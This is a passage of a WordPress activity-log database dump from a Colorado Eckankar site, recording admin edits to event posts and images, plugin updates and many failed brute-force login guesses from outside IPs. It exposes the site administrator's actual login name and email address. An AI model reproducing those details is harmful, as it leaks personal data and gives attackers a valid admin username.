Klemp'),(240505,40904,'attachment_parent_post_type','mec-events'),(240506,40904,'_message_key','attachment_created'),(240507,40904,'_user_id','2'),(240508,40904,'_user_login','S8zhaBda'),(240509,40904,'_user_email','nada@zipnadanot.org'),(240510,40904,'_server_remote_addr','76.130.120.x'),(240511,40904,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240512,40905,'post_id','269330'),(240513,40905,'post_type','mec-events'),(240514,40905,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240515,40905,'post_prev_thumb_id','267350'),(240516,40905,'post_prev_thumb_title','harold-talk-OCT-2022-promo-2'),(240517,40905,'post_new_thumb_id','269331'),(240518,40905,'post_new_thumb_title','video-rebroadcast-3'),(240519,40905,'_message_key','post_updated'),(240520,40905,'_user_id','2'),(240521,40905,'_user_login','S8zhaBda'),(240522,40905,'_user_email','nada@zipnadanot.org'),(240523,40905,'_server_remote_addr','76.130.120.x'),(240524,40905,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240525,40906,'post_type','attachment'),(240526,40906,'attachment_id','269331'),(240527,40906,'attachment_title','video-rebroadcast-3'),(240528,40906,'attachment_filename','video-rebroadcast-3.jpg'),(240529,40906,'attachment_mime','image/jpeg'),(240530,40906,'_message_key','attachment_deleted'),(240531,40906,'_user_id','2'),(240532,40906,'_user_login','S8zhaBda'),(240533,40906,'_user_email','nada@zipnadanot.org'),(240534,40906,'_server_remote_addr','76.130.120.x'),(240535,40906,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240536,40907,'post_type','attachment'),(240537,40907,'attachment_id','269332'),(240538,40907,'attachment_title','video-rebroadcast-4'),(240539,40907,'attachment_filename','video-rebroadcast-4.jpg'),(240540,40907,'attachment_mime','image/jpeg'),(240541,40907,'attachment_filesize','87345'),(240542,40907,'attachment_parent_id','269330'),(240543,40907,'attachment_parent_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240544,40907,'attachment_parent_post_type','mec-events'),(240545,40907,'_message_key','attachment_created'),(240546,40907,'_user_id','2'),(240547,40907,'_user_login','S8zhaBda'),(240548,40907,'_user_email','nada@zipnadanot.org'),(240549,40907,'_server_remote_addr','76.130.120.x'),(240550,40907,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240551,40908,'post_id','269330'),(240552,40908,'post_type','mec-events'),(240553,40908,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240554,40908,'post_new_thumb_id','269332'),(240555,40908,'post_new_thumb_title','video-rebroadcast-4'),(240556,40908,'_message_key','post_updated'),(240557,40908,'_user_id','2'),(240558,40908,'_user_login','S8zhaBda'),(240559,40908,'_user_email','nada@zipnadanot.org'),(240560,40908,'_server_remote_addr','76.130.120.x'),(240561,40908,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240562,40909,'post_id','269330'),(240563,40909,'post_type','mec-events'),(240564,40909,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240565,40909,'_message_key','post_updated'),(240566,40909,'_user_id','2'),(240567,40909,'_user_login','S8zhaBda'),(240568,40909,'_user_email','nada@zipnadanot.org'),(240569,40909,'_server_remote_addr','76.130.120.x'),(240570,40909,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240571,40910,'_user_id','2'),(240572,40910,'_user_login','S8zhaBda'),(240573,40910,'_user_email','nada@zipnadanot.org'),(240574,40910,'_message_key','user_logged_out'),(240575,40910,'_server_remote_addr','76.130.120.x'),(240576,40910,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(240577,40911,'failed_username','admin'),(240578,40911,'server_http_user_agent','Mozilla/5.0'),(240579,40911,'_message_key','user_unknown_login_failed'),(240580,40911,'_server_remote_addr','13.95.232.x'),(240581,40912,'failed_username','admin'),(240582,40912,'server_http_user_agent','Mozilla/5.0'),(240583,40912,'_message_key','user_unknown_login_failed'),(240584,40912,'_server_remote_addr','13.95.232.x'),(240585,40913,'failed_username','admin'),(240586,40913,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(240587,40913,'_message_key','user_unknown_login_failed'),(240588,40913,'_server_remote_addr','146.190.71.x'),(240589,40914,'post_id','269333'),(240590,40914,'post_type','nf_sub'),(240591,40914,'post_title',''),(240592,40914,'_message_key','post_updated'),(240593,40914,'_server_remote_addr','184.96.140.x'),(240594,40914,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(240595,40915,'failed_username','admin'),(240596,40915,'server_http_user_agent','Mozilla/5.0'),(240597,40915,'_message_key','user_unknown_login_failed'),(240598,40915,'_server_remote_addr','13.95.232.x'),(240599,40916,'failed_username','admin'),(240600,40916,'server_http_user_agent','Mozilla/5.0'),(240601,40916,'_message_key','user_unknown_login_failed'),(240602,40916,'_server_remote_addr','13.95.232.x'),(240603,40917,'failed_username','admin'),(240604,40917,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(240605,40917,'_message_key','user_unknown_login_failed'),(240606,40917,'_server_remote_addr','143.110.244.x'),(240607,40918,'post_id','269334'),(240608,40918,'post_type','nf_sub'),(240609,40918,'post_title',''),(240610,40918,'_message_key','post_updated'),(240611,40918,'_server_remote_addr','209.131.238.x'),(240612,40918,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(240613,40919,'post_id','269335'),(240614,40919,'post_type','nf_sub'),(240615,40919,'post_title',''),(240616,40919,'_message_key','post_updated'),(240617,40919,'_server_remote_addr','209.131.238.x'),(240618,40919,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(240619,40920,'post_id','269336'),(240620,40920,'post_type','nf_sub'),(240621,40920,'post_title',''),(240622,40920,'_message_key','post_updated'),(240623,40920,'_server_remote_addr','209.131.238.x'),(240624,40920,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(240625,40921,'failed_username','admin'),(240626,40921,'server_http_user_agent','Mozilla/5.0'),(240627,40921,'_message_key','user_unknown_login_failed'),(240628,40921,'_server_remote_addr','13.95.232.x'),(240629,40922,'user_id','2'),(240630,40922,'user_email','nada@zipnadanot.org'),(240631,40922,'user_login','S8zhaBda'),(240632,40922,'_user_id','2'),(240633,40922,'_user_login','S8zhaBda'),(240634,40922,'_user_email','nada@zipnadanot.org'),(240635,40922,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(240636,40922,'_message_key','user_logged_in'),(240637,40922,'_server_remote_addr','76.130.120.x'),(240638,40922,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(240639,40923,'post_type','attachment'),(240640,40923,'attachment_id','269332'),(240641,40923,'attachment_title','video-rebroadcast-4'),(240642,40923,'attachment_filename','video-rebroadcast-4.jpg'),(240643,40923,'attachment_mime','image/jpeg'),(240644,40923,'_message_key','attachment_deleted'),(240645,40923,'_user_id','2'),(240646,40923,'_user_login','S8zhaBda'),(240647,40923,'_user_email','nada@zipnadanot.org'),(240648,40923,'_server_remote_addr','76.130.120.x'),(240649,40923,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240650,40924,'post_type','attachment'),(240651,40924,'attachment_id','269337'),(240652,40924,'attachment_title','video-rebroadcast-5'),(240653,40924,'attachment_filename','video-rebroadcast-5.jpg'),(240654,40924,'attachment_mime','image/jpeg'),(240655,40924,'attachment_filesize','87162'),(240656,40924,'attachment_parent_id','269330'),(240657,40924,'attachment_parent_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240658,40924,'attachment_parent_post_type','mec-events'),(240659,40924,'_message_key','attachment_created'),(240660,40924,'_user_id','2'),(240661,40924,'_user_login','S8zhaBda'),(240662,40924,'_user_email','nada@zipnadanot.org'),(240663,40924,'_server_remote_addr','76.130.120.x'),(240664,40924,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240665,40925,'post_id','269330'),(240666,40925,'post_type','mec-events'),(240667,40925,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240668,40925,'post_new_thumb_id','269337'),(240669,40925,'post_new_thumb_title','video-rebroadcast-5'),(240670,40925,'_message_key','post_updated'),(240671,40925,'_user_id','2'),(240672,40925,'_user_login','S8zhaBda'),(240673,40925,'_user_email','nada@zipnadanot.org'),(240674,40925,'_server_remote_addr','76.130.120.x'),(240675,40925,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240676,40926,'failed_username','admin'),(240677,40926,'server_http_user_agent','Mozilla/5.0'),(240678,40926,'_message_key','user_unknown_login_failed'),(240679,40926,'_server_remote_addr','151.236.22.x'),(240680,40927,'post_type','attachment'),(240681,40927,'attachment_id','269338'),(240682,40927,'attachment_title','video-rebroadcast-7'),(240683,40927,'attachment_filename','video-rebroadcast-7.jpg'),(240684,40927,'attachment_mime','image/jpeg'),(240685,40927,'attachment_filesize','83044'),(240686,40927,'attachment_parent_id','269330'),(240687,40927,'attachment_parent_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240688,40927,'attachment_parent_post_type','mec-events'),(240689,40927,'_message_key','attachment_created'),(240690,40927,'_user_id','2'),(240691,40927,'_user_login','S8zhaBda'),(240692,40927,'_user_email','nada@zipnadanot.org'),(240693,40927,'_server_remote_addr','76.130.120.x'),(240694,40927,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240695,40928,'post_type','attachment'),(240696,40928,'attachment_id','269337'),(240697,40928,'attachment_title','video-rebroadcast-5'),(240698,40928,'attachment_filename','video-rebroadcast-5.jpg'),(240699,40928,'attachment_mime','image/jpeg'),(240700,40928,'_message_key','attachment_deleted'),(240701,40928,'_user_id','2'),(240702,40928,'_user_login','S8zhaBda'),(240703,40928,'_user_email','nada@zipnadanot.org'),(240704,40928,'_server_remote_addr','76.130.120.x'),(240705,40928,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240706,40929,'post_id','269330'),(240707,40929,'post_type','mec-events'),(240708,40929,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240709,40929,'post_new_thumb_id','269338'),(240710,40929,'post_new_thumb_title','video-rebroadcast-7'),(240711,40929,'_message_key','post_updated'),(240712,40929,'_user_id','2'),(240713,40929,'_user_login','S8zhaBda'),(240714,40929,'_user_email','nada@zipnadanot.org'),(240715,40929,'_server_remote_addr','76.130.120.x'),(240716,40929,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269330&action=edit'),(240717,40930,'post_type','attachment'),(240718,40930,'attachment_id','269339'),(240719,40930,'attachment_title','video-rebroadcast-lite-6'),(240720,40930,'attachment_filename','video-rebroadcast-lite-6.jpg'),(240721,40930,'attachment_mime','image/jpeg'),(240722,40930,'attachment_filesize','89754'),(240723,40930,'attachment_parent_id','269272'),(240724,40930,'attachment_parent_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240725,40930,'attachment_parent_post_type','mec-events'),(240726,40930,'_message_key','attachment_created'),(240727,40930,'_user_id','2'),(240728,40930,'_user_login','S8zhaBda'),(240729,40930,'_user_email','nada@zipnadanot.org'),(240730,40930,'_server_remote_addr','76.130.120.x'),(240731,40930,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269272&action=edit'),(240732,40931,'post_id','269272'),(240733,40931,'post_type','mec-events'),(240734,40931,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240735,40931,'post_prev_thumb_id','267350'),(240736,40931,'post_prev_thumb_title','harold-talk-OCT-2022-promo-2'),(240737,40931,'post_new_thumb_id','269339'),(240738,40931,'post_new_thumb_title','video-rebroadcast-lite-6'),(240739,40931,'_message_key','post_updated'),(240740,40931,'_user_id','2'),(240741,40931,'_user_login','S8zhaBda'),(240742,40931,'_user_email','nada@zipnadanot.org'),(240743,40931,'_server_remote_addr','76.130.120.x'),(240744,40931,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269272&action=edit'),(240745,40932,'failed_username','admin'),(240746,40932,'server_http_user_agent','Mozilla/5.0'),(240747,40932,'_message_key','user_unknown_login_failed'),(240748,40932,'_server_remote_addr','45.147.248.x'),(240749,40933,'failed_username','admin'),(240750,40933,'server_http_user_agent','Mozilla/5.0'),(240751,40933,'_message_key','user_unknown_login_failed'),(240752,40933,'_server_remote_addr','151.236.22.x'),(240753,40934,'failed_username','admin'),(240754,40934,'server_http_user_agent','Mozilla/5.0'),(240755,40934,'_message_key','user_unknown_login_failed'),(240756,40934,'_server_remote_addr','13.95.232.x'),(240757,40935,'failed_username','admin'),(240758,40935,'server_http_user_agent','Mozilla/5.0'),(240759,40935,'_message_key','user_unknown_login_failed'),(240760,40935,'_server_remote_addr','151.236.22.x'),(240761,40936,'_user_id','2'),(240762,40936,'_user_login','S8zhaBda'),(240763,40936,'_user_email','nada@zipnadanot.org'),(240764,40936,'_message_key','user_logged_out'),(240765,40936,'_server_remote_addr','76.130.120.x'),(240766,40936,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=boldgrid-backup'),(240767,40937,'failed_username','admin'),(240768,40937,'server_http_user_agent','Mozilla/5.0'),(240769,40937,'_message_key','user_unknown_login_failed'),(240770,40937,'_server_remote_addr','151.236.22.x'),(240771,40938,'failed_username','admin'),(240772,40938,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(240773,40938,'_message_key','user_unknown_login_failed'),(240774,40938,'_server_remote_addr','185.208.180.x'),(240775,40939,'failed_username','admin'),(240776,40939,'server_http_user_agent','Mozilla/5.0'),(240777,40939,'_message_key','user_unknown_login_failed'),(240778,40939,'_server_remote_addr','45.147.248.x'),(240779,40940,'failed_username','admin'),(240780,40940,'server_http_user_agent','Mozilla/5.0'),(240781,40940,'_message_key','user_unknown_login_failed'),(240782,40940,'_server_remote_addr','151.236.22.x'),(240783,40941,'failed_username','admin'),(240784,40941,'server_http_user_agent','Mozilla/5.0'),(240785,40941,'_message_key','user_unknown_login_failed'),(240786,40941,'_server_remote_addr','13.95.232.x'),(240787,40942,'failed_username','admin'),(240788,40942,'server_http_user_agent','Mozilla/5.0'),(240789,40942,'_message_key','user_unknown_login_failed'),(240790,40942,'_server_remote_addr','151.236.22.x'),(240791,40943,'failed_username','admin'),(240792,40943,'server_http_user_agent','Mozilla/5.0'),(240793,40943,'_message_key','user_unknown_login_failed'),(240794,40943,'_server_remote_addr','151.236.22.x'),(240795,40944,'failed_username','admin'),(240796,40944,'server_http_user_agent','Mozilla/5.0'),(240797,40944,'_message_key','user_unknown_login_failed'),(240798,40944,'_server_remote_addr','45.147.248.x'),(240799,40945,'failed_username','admin'),(240800,40945,'server_http_user_agent','Mozilla/5.0'),(240801,40945,'_message_key','user_unknown_login_failed'),(240802,40945,'_server_remote_addr','13.95.232.x'),(240803,40946,'failed_username','admin'),(240804,40946,'server_http_user_agent','Mozilla/5.0'),(240805,40946,'_message_key','user_unknown_login_failed'),(240806,40946,'_server_remote_addr','151.236.22.x'),(240807,40947,'failed_username','admin'),(240808,40947,'server_http_user_agent','Mozilla/5.0'),(240809,40947,'_message_key','user_unknown_login_failed'),(240810,40947,'_server_remote_addr','151.236.22.x'),(240811,40948,'failed_username','admin'),(240812,40948,'server_http_user_agent','Mozilla/5.0'),(240813,40948,'_message_key','user_unknown_login_failed'),(240814,40948,'_server_remote_addr','45.147.248.x'),(240815,40949,'failed_username','admin'),(240816,40949,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(240817,40949,'_message_key','user_unknown_login_failed'),(240818,40949,'_server_remote_addr','147.135.255.x'),(240819,40950,'failed_username','admin'),(240820,40950,'server_http_user_agent','Mozilla/5.0'),(240821,40950,'_message_key','user_unknown_login_failed'),(240822,40950,'_server_remote_addr','151.236.22.x'),(240823,40951,'failed_username','admin'),(240824,40951,'server_http_user_agent','Mozilla/5.0'),(240825,40951,'_message_key','user_unknown_login_failed'),(240826,40951,'_server_remote_addr','13.95.232.x'),(240827,40952,'failed_username','admin'),(240828,40952,'server_http_user_agent','Mozilla/5.0'),(240829,40952,'_message_key','user_unknown_login_failed'),(240830,40952,'_server_remote_addr','45.147.248.x'),(240831,40953,'failed_username','admin'),(240832,40953,'server_http_user_agent','Mozilla/5.0'),(240833,40953,'_message_key','user_unknown_login_failed'),(240834,40953,'_server_remote_addr','151.236.22.x'),(240835,40954,'failed_username','wordpress_administrator'),(240836,40954,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(240837,40954,'_message_key','user_unknown_login_failed'),(240838,40954,'_server_remote_addr','107.189.29.x'),(240839,40955,'failed_username','admin'),(240840,40955,'server_http_user_agent','Mozilla/5.0'),(240841,40955,'_message_key','user_unknown_login_failed'),(240842,40955,'_server_remote_addr','45.147.248.x'),(240843,40956,'failed_username','wpengine'),(240844,40956,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(240845,40956,'_message_key','user_unknown_login_failed'),(240846,40956,'_xmlrpc_request','true'),(240847,40956,'_server_remote_addr','35.176.43.x'),(240848,40957,'failed_username','admin'),(240849,40957,'server_http_user_agent','Mozilla/5.0'),(240850,40957,'_message_key','user_unknown_login_failed'),(240851,40957,'_server_remote_addr','13.95.232.x'),(240852,40958,'failed_username','wordpress_administrator'),(240853,40958,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),(240854,40958,'_message_key','user_unknown_login_failed'),(240855,40958,'_server_remote_addr','107.189.11.x'),(240856,40959,'failed_username','admin'),(240857,40959,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(240858,40959,'_message_key','user_unknown_login_failed'),(240859,40959,'_server_remote_addr','159.223.222.x'),(240860,40960,'failed_username','admin'),(240861,40960,'server_http_user_agent','Mozilla/5.0'),(240862,40960,'_message_key','user_unknown_login_failed'),(240863,40960,'_server_remote_addr','13.95.232.x'),(240864,40961,'failed_username','admin'),(240865,40961,'server_http_user_agent','Mozilla/5.0'),(240866,40961,'_message_key','user_unknown_login_failed'),(240867,40961,'_server_remote_addr','45.147.248.x'),(240868,40962,'failed_username','admin'),(240869,40962,'server_http_user_agent','Mozilla/5.0'),(240870,40962,'_message_key','user_unknown_login_failed'),(240871,40962,'_server_remote_addr','13.95.232.x'),(240872,40963,'failed_username','admin'),(240873,40963,'server_http_user_agent','Mozilla/5.0'),(240874,40963,'_message_key','user_unknown_login_failed'),(240875,40963,'_server_remote_addr','45.147.248.x'),(240876,40964,'failed_username','admin'),(240877,40964,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(240878,40964,'_message_key','user_unknown_login_failed'),(240879,40964,'_server_remote_addr','66.70.170.x'),(240880,40965,'failed_username','admin'),(240881,40965,'server_http_user_agent','Mozilla/5.0'),(240882,40965,'_message_key','user_unknown_login_failed'),(240883,40965,'_server_remote_addr','13.95.232.x'),(240884,40966,'failed_username','admin'),(240885,40966,'server_http_user_agent','Mozilla/5.0'),(240886,40966,'_message_key','user_unknown_login_failed'),(240887,40966,'_server_remote_addr','45.147.248.x'),(240888,40967,'failed_username','admin'),(240889,40967,'server_http_user_agent','Mozilla/5.0'),(240890,40967,'_message_key','user_unknown_login_failed'),(240891,40967,'_server_remote_addr','45.147.248.x'),(240892,40968,'failed_username','admin'),(240893,40968,'server_http_user_agent','Mozilla/5.0'),(240894,40968,'_message_key','user_unknown_login_failed'),(240895,40968,'_server_remote_addr','13.95.232.x'),(240896,40969,'failed_username','admin'),(240897,40969,'server_http_user_agent','Mozilla/5.0'),(240898,40969,'_message_key','user_unknown_login_failed'),(240899,40969,'_server_remote_addr','45.147.248.x'),(240900,40970,'failed_username','admin'),(240901,40970,'server_http_user_agent','Mozilla/5.0'),(240902,40970,'_message_key','user_unknown_login_failed'),(240903,40970,'_server_remote_addr','13.95.232.x'),(240904,40971,'failed_username','admin'),(240905,40971,'server_http_user_agent','Mozilla/5.0'),(240906,40971,'_message_key','user_unknown_login_failed'),(240907,40971,'_server_remote_addr','13.95.232.x'),(240908,40972,'failed_username','admin'),(240909,40972,'server_http_user_agent','Mozilla/5.0'),(240910,40972,'_message_key','user_unknown_login_failed'),(240911,40972,'_server_remote_addr','45.147.248.x'),(240912,40973,'failed_username','admin'),(240913,40973,'server_http_user_agent','Mozilla/5.0'),(240914,40973,'_message_key','user_unknown_login_failed'),(240915,40973,'_server_remote_addr','13.95.232.x'),(240916,40974,'failed_username','admin'),(240917,40974,'server_http_user_agent','Mozilla/5.0'),(240918,40974,'_message_key','user_unknown_login_failed'),(240919,40974,'_server_remote_addr','45.147.248.x'),(240920,40975,'failed_username','admin'),(240921,40975,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(240922,40975,'_message_key','user_unknown_login_failed'),(240923,40975,'_server_remote_addr','54.37.156.x'),(240924,40976,'failed_username','wordpress_administrator'),(240925,40976,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(240926,40976,'_message_key','user_unknown_login_failed'),(240927,40976,'_server_remote_addr','209.141.46.x'),(240928,40977,'failed_username','admin'),(240929,40977,'server_http_user_agent','Mozilla/5.0'),(240930,40977,'_message_key','user_unknown_login_failed'),(240931,40977,'_server_remote_addr','13.95.232.x'),(240932,40978,'failed_username','wadminw'),(240933,40978,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(240934,40978,'_message_key','user_unknown_login_failed'),(240935,40978,'_server_remote_addr','47.242.181.x'),(240936,40979,'failed_username','admin'),(240937,40979,'server_http_user_agent','Mozilla/5.0'),(240938,40979,'_message_key','user_unknown_login_failed'),(240939,40979,'_server_remote_addr','13.95.232.x'),(240940,40980,'failed_username','admin'),(240941,40980,'server_http_user_agent','Mozilla/5.0'),(240942,40980,'_message_key','user_unknown_login_failed'),(240943,40980,'_server_remote_addr','13.95.232.x'),(240944,40981,'failed_username','admin'),(240945,40981,'server_http_user_agent','Mozilla/5.0'),(240946,40981,'_message_key','user_unknown_login_failed'),(240947,40981,'_server_remote_addr','13.95.232.x'),(240948,40982,'failed_username','wwwadmin'),(240949,40982,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(240950,40982,'_message_key','user_unknown_login_failed'),(240951,40982,'_server_remote_addr','157.230.191.x'),(240952,40983,'failed_username','admin'),(240953,40983,'server_http_user_agent','Mozilla/5.0'),(240954,40983,'_message_key','user_unknown_login_failed'),(240955,40983,'_server_remote_addr','45.147.248.x'),(240956,40984,'failed_username','admin'),(240957,40984,'server_http_user_agent','Mozilla/5.0'),(240958,40984,'_message_key','user_unknown_login_failed'),(240959,40984,'_server_remote_addr','13.95.232.x'),(240960,40985,'failed_username','admin'),(240961,40985,'server_http_user_agent','Mozilla/5.0'),(240962,40985,'_message_key','user_unknown_login_failed'),(240963,40985,'_server_remote_addr','45.147.248.x'),(240964,40986,'failed_username','admin'),(240965,40986,'server_http_user_agent','Mozilla/5.0'),(240966,40986,'_message_key','user_unknown_login_failed'),(240967,40986,'_server_remote_addr','45.147.248.x'),(240968,40987,'failed_username','admin'),(240969,40987,'server_http_user_agent','Mozilla/5.0'),(240970,40987,'_message_key','user_unknown_login_failed'),(240971,40987,'_server_remote_addr','13.95.232.x'),(240972,40988,'user_id','2'),(240973,40988,'user_email','nada@zipnadanot.org'),(240974,40988,'user_login','S8zhaBda'),(240975,40988,'_user_id','2'),(240976,40988,'_user_login','S8zhaBda'),(240977,40988,'_user_email','nada@zipnadanot.org'),(240978,40988,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(240979,40988,'_message_key','user_logged_in'),(240980,40988,'_server_remote_addr','76.130.120.x'),(240981,40988,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(240982,40989,'plugin_slug','advanced-google-recaptcha'),(240983,40989,'plugin_name','Advanced Google reCAPTCHA'),(240984,40989,'plugin_title','<a href=\"https://getwpcaptcha.com/\">Advanced Google reCAPTCHA</a>'),(240985,40989,'plugin_description','Advanced Google reCAPTCHA will safeguard your WordPress site from spam comments and brute force attacks. With this plugin, you can easily add Google reCAPTCHA to WordPress comment form, login form and other forms. <cite>By <a href=\"https://www.webfactoryltd.com/\">WebFactory Ltd</a>.</cite>'),(240986,40989,'plugin_author','<a href=\"https://www.webfactoryltd.com/\">WebFactory Ltd</a>'),(240987,40989,'plugin_version','1.12'),(240988,40989,'plugin_url','https://getwpcaptcha.com/'),(240989,40989,'plugin_prev_version','1.0.15'),(240990,40989,'_message_key','plugin_bulk_updated'),(240991,40989,'_user_id','2'),(240992,40989,'_user_login','S8zhaBda'),(240993,40989,'_user_email','nada@zipnadanot.org'),(240994,40989,'_server_remote_addr','76.130.120.x'),(240995,40989,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(240996,40990,'plugin_slug','fluentform'),(240997,40990,'plugin_name','Fluent Forms'),(240998,40990,'plugin_title','<a href=\"https://wpmanageninja.com/wp-fluent-form/\">Fluent Forms</a>'),(240999,40990,'plugin_description','Contact Form By Fluent Forms is the advanced Contact form plugin with drag and drop, multi column supported form builder plugin <cite>By <a href=\"https://fluentforms.com\">Contact Form - WPManageNinja LLC</a>.</cite>'),(241000,40990,'plugin_author','<a href=\"https://fluentforms.com\">Contact Form - WPManageNinja LLC</a>'),(241001,40990,'plugin_version','5.1.0'),(241002,40990,'plugin_url','https://wpmanageninja.com/wp-fluent-form/'),(241003,40990,'plugin_prev_version','5.0.12'),(241004,40990,'_message_key','plugin_bulk_updated'),(241005,40990,'_user_id','2'),(241006,40990,'_user_login','S8zhaBda'),(241007,40990,'_user_email','nada@zipnadanot.org'),(241008,40990,'_server_remote_addr','76.130.120.x'),(241009,40990,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241010,40991,'plugin_slug','ga-google-analytics'),(241011,40991,'plugin_name','GA Google Analytics'),(241012,40991,'plugin_title','<a href=\"https://perishablepress.com/google-analytics-plugin/\">GA Google Analytics</a>'),(241013,40991,'plugin_description','Adds your Google Analytics Tracking Code to your WordPress site. <cite>By <a href=\"https://plugin-planet.com/\">Jeff Starr</a>.</cite>'),(241014,40991,'plugin_author','<a href=\"https://plugin-planet.com/\">Jeff Starr</a>'),(241015,40991,'plugin_version','20231101'),(241016,40991,'plugin_url','https://perishablepress.com/google-analytics-plugin/'),(241017,40991,'plugin_prev_version','20230721'),(241018,40991,'_message_key','plugin_bulk_updated'),(241019,40991,'_user_id','2'),(241020,40991,'_user_login','S8zhaBda'),(241021,40991,'_user_email','nada@zipnadanot.org'),(241022,40991,'_server_remote_addr','76.130.120.x'),(241023,40991,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241024,40992,'plugin_slug','content-protector'),(241025,40992,'plugin_name','Passster'),(241026,40992,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(241027,40992,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(241028,40992,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(241029,40992,'plugin_version','4.2.5'),(241030,40992,'plugin_url','https://patrickposner.dev'),(241031,40992,'plugin_prev_version','4.2.4'),(241032,40992,'_message_key','plugin_bulk_updated'),(241033,40992,'_user_id','2'),(241034,40992,'_user_login','S8zhaBda'),(241035,40992,'_user_email','nada@zipnadanot.org'),(241036,40992,'_server_remote_addr','76.130.120.x'),(241037,40992,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241038,40993,'plugin_slug','simple-history'),(241039,40993,'plugin_name','Simple History'),(241040,40993,'plugin_title','<a href=\"https://simple-history.com\">Simple History</a>'),(241041,40993,'plugin_description','Plugin that logs various things that occur in WordPress and then presents those events in a very nice GUI. <cite>By <a href=\"https://simple-history.com/\">Pär Thernström</a>.</cite>'),(241042,40993,'plugin_author','<a href=\"https://simple-history.com/\">Pär 